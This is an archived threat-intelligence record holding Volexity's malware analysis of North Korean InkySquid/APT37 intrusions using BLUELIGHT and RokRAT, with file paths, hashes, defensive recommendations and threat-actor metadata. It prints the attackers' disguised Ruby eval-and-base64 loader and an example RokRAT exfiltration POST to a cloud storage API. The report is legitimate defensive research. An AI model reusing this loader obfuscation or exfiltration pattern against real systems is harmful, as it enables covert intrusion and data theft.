{ "id": "299de66b-b14e-4b3f-b952-d571b6661269", "created_at": "2026-04-06T00:14:38.40513Z", "updated_at": "2026-04-10T03:38:06.536801Z", "deleted_at": null, "sha1_hash": "f7e076ed48892df5cd68575d11c4409326dd8dc1", "title": "North Korean BLUELIGHT Special: InkySquid Deploys RokRAT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 564581, "plain_text": "North Korean BLUELIGHT Special: InkySquid Deploys RokRAT\r\nBy mindgrub\r\nPublished: 2021-08-24 · Archived: 2026-04-05 14:59:45 UTC\r\nIn a recent blog post, Volexity disclosed details on a portion of the operations by a North Korean threat actor it\r\ntracks as InkySquid. This threat actor compromised a news portal to use recently patched browser exploits to\r\ndeliver a custom malware family known as BLUELIGHT.\r\nThis follow-up post describes findings from a recent investigation undertaken by Volexity in which the\r\nBLUELIGHT malware was discovered being delivered to a victim alongside RokRAT (aka DOGCALL). \r\nRokRAT is a backdoor previously attributed to use by ScarCruft/APT37, which is also known as InkySquid. It\r\nshould be noted that Volexity identified some overlap between the findings discussed in this post and this Korean-language article.\r\nAnalysis\r\nVolexity is often asked to analyze systems of users frequently targeted by state-sponsored threat actors based on\r\nsome tip-off or concern that the systems may be compromised. In this case, it was a system belonging to an\r\nindividual who is a frequent target of North Korean threat actors. Prior to contacting Volexity, the user had run\r\nfour separate, popular antivirus programs in  attempts to identify and remove any malware. Despite these actions,\r\nthe user was still concerned that their machine may have been infected. Despite less-than-ideal conditions for the\r\nstarting analysis state, Volexity was able to identify two separate malware infections on the system, and a likely\r\nstart date for the infection. However, it was not possible to confirm how it became infected, as it had been\r\nrebooted multiple times since initial infection and several weeks had passed.\r\nhttps://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/\r\nPage 1 of 5\n\nThe first malware discovered was installed using a convoluted loading mechanism, where a full copy of Python\r\n2.7 was installed into the following directory:\r\n%USERPROFILE%/Python27(64)\r\nAn encoded blob was then stored in the following location:\r\n%PROGRAMDATA%/hiddigi/msihnd\r\nA loading script written in Python was written to the following directory:\r\n%LocalAppData%/Microsoft/mdmadc/KBDBGPH1\r\nFollowing this, the attacker configured a Scheduled Task to use the Python binary to run the loading script and\r\nexecute the encoded blob. The script decoded a shellcode stub at the head of the msihnd file, which is responsible\r\nfor setting up a child process using the name of a randomly chosen EXE file from the “C:\\Windows\\System32”\r\ndirectory. The main malware was then decoded from data stored after the initial shellcode, using a single-byte\r\nXOR key of 0x74. The result of this process was that a version of the BLUELIGHT malware family would be\r\nloaded. While the sample of BLUELIGHT analyzed in the previous post used Microsoft Graph for command and\r\ncontrol, this version used a custom Google Web App.\r\nLess than 10 minutes after deploying BLUELIGHT, the attacker installed a second malware family. The loading\r\nmechanism for this family was similar to that used for BLUELIGHT; although this time, a copy of Ruby was\r\ninstalled at the following path:\r\n%LOCALAPPDATA%/Microsoft/Ruby27-x64/\r\nThe attacker dropped two encoded blobs to the following locations:\r\n%PROGRAMDATA%/User-Mode Bus Enumerator/1BA76030/Shortcut_674D.info\r\n%PROGRAMDATA%/Local Kernel Debugger/18E911AC/WinSDK_4641.info\r\nA loading script, written in Ruby, was saved to the following location and set to run as a Scheduled Task:\r\n%PROGRAMDATA%/Microsoft Basic Display Driver/57D45646/Readme.io.md\r\nThe Ruby loading script was made to appear as though it were a real system file, with comments indicating it was\r\npart of the operating system. The malicious content is encoded within a URL string, as shown in the Ruby script\r\nbelow:\r\nhttps://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/\r\nPage 2 of 5\n\n# 14:21:58 27/02/2004\r\n# Copyright (c) Microsoft Corporation.All rights reserved.\r\nrequire 'base64'\r\nrequire 'fiddle/import'\r\n# Update Driver: name=Microsoft Basic Display Driver, id=289A1260\r\nurl7d37 = 'https://update.microsoft.com/driverupdate?id=K0AM3YEMjoQD7kCMxoCM2oCMwATMgwCZhVm\r\nalias UrlFilter1462 eval;\r\n# UrlFilter: id=74F51EE8\r\nUrlFilter1462(Base64.decode64(url7d37[45..-1].reverse));\r\nThe effect of this script is to reverse the content after “id=” in the URL and base64 decode it, yielding the real\r\nscript’s true intent:  to decrypt the previously written Shortcut_674D.info file using a simple XOR operation.\r\nAfter the Shortcut_674D.info file is decrypted, it is executed within a new thread. This data acts as shellcode that\r\nseeks out and decrypts an embedded blob of data using a mix of ROL and XOR operations. After decryption, an\r\nexecutable file remains and is then run.\r\nThe resulting executable acts as another loader for yet another embedded file. However, this loader uses the\r\nhostname of the current system to decrypt the embedded payload. Therefore, if it is run on any system other than\r\nthe one intended, the malware will fail to execute. This trait illustrates that the malware is customized; it was\r\ncreated specifically for the exact victim system on which it was discovered.\r\nIf decryption of the payload is successful, the final payload is an instance of the RokRAT malware family with the\r\nfollowing properties:\r\nSHA256 19ee7d139908a889d08508dd4225f2d27958ac2c8b7ff18a97507f7de8ce79bc\r\nSHA1 ff080176ab9e51ace68dbe3a56629168b41fa1fc\r\nMD5 9d2e5f9274b25740131f3b6139e3c3ce\r\nFile Type Win64 EXE\r\nCompile Time 2021:05:25 02:20:44+01:00\r\nMuch like BLUELIGHT, this malware family uses cloud services for all communications, supporting PCloud,\r\nYandex, Dropbox, and Box for command and control. The API keys for this communication are embedded within\r\nthe malware itself. The malware is able to perform a number of functions, including but not limited to the\r\nfollowing:\r\nhttps://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/\r\nPage 3 of 5\n\nKeylogging and extraction of clipboard data\r\nCollection of specific filetypes\r\nDownload/execute further payloads\r\nExfiltrated data is encrypted using an RSA public key, preventing third parties from decrypting it. An example\r\nexfiltration request is below:\r\nPOST /uploadfile?path=/1\u0026filename=202106221534400000.q00\u0026nopartial=1 HTTP/1.1\r\nConnection: close\r\nContent-Type: multipart/form-data;boundary=–wwjaughalvncjwiajs–\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.8\r\nAuthorization: Bearer PpmL7Z9qHXPhLX38[TRUNCATED]kuk7HTet3AWYjwvAhuB\r\nUser-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\nContent-Length: 71795\r\nHost: api.pcloud.com\r\n—-wwjaughalvncjwiajs–\r\nContent-Disposition: form-data; name=”file”; filename=”202106221534500000.q00″\r\nContent-Type: voice/mp3\r\n[DATA]\r\nMuch like its loader, this copy of RokRAT uses the victim’s hostname for decryption of important strings; it will\r\nfail to execute properly if the correct hostname is not present on the machine on which it is run. Additionally,\r\nstrings within the malware referenced specific file paths that resided on the victim’s system. Presumably these\r\npaths were discovered by the attacker while running commands using BLUELIGHT, meaning the sample was\r\ncompiled “live” following initial reconnaissance on the victim’s system.\r\nConclusion\r\nRokRAT is a closed-source malware family believed to be used exclusively by the North Korean APT37 threat\r\nactor, which Volexity tracks as InkySquid. The threat actor has attracted little public attention in the last year and a\r\nhalf. In this case, Volexity was able to tie the new BLUELIGHT malware family observed in the incident\r\ndescribed in the previous post to APT37 based on the use of RokRAT malware, since they were observed being\r\ndeployed sequentially during the intrusion.\r\nBoth the BLUELIGHT malware family and RokRAT use cloud services for command and control, making\r\nnetwork-based detection more difficult. Additionally, while the installation of full copies of scripting languages\r\nsuch as Ruby and Python is noisy, they are cleverly used to obfuscate the actual malware which remains encoded\r\non disk and is only truly visible in memory.\r\nThe infected user attempted to scan their machine with four different antivirus programs prior to Volexity’s\r\ninvestigation. None detected the presence of either the RokRAT or BLUELIGHT malware families, showing the\r\neffectiveness of these techniques to load these malware families to evade detection.\r\nhttps://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/\r\nPage 4 of 5\n\nTo prevent similar attacks from being effective against your organization, Volexity recommends the following:\r\nIf enterprise users do not require access to cloud storage resources, consider blocking them as they are\r\ndifficult to detect from a command-and-control perspective.\r\nConsider monitoring for and alerting on new scheduled tasks containing unusual arguments, particularly\r\nscripting language-based scheduled tasks.\r\nTo prevent these specific attacks from being successful:\r\nUse the YARA rules provided here to identify related malware.\r\nBlock the Google App domain “636478154616-\r\nbt8kmnrg1l6oml3ipv7ifc6bck0in18h.apps.googleusercontent.com”.\r\nSource: https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/\r\nhttps://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE", "Malpedia" ], "references": [ "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/" ], "report_names": [ "north-korean-bluelight-special-inkysquid-deploys-rokrat" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434478, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f7e076ed48892df5cd68575d11c4409326dd8dc1.pdf", "text": "https://archive.orkl.eu/f7e076ed48892df5cd68575d11c4409326dd8dc1.txt", "img": "https://archive.orkl.eu/f7e076ed48892df5cd68575d11c4409326dd8dc1.jpg" } }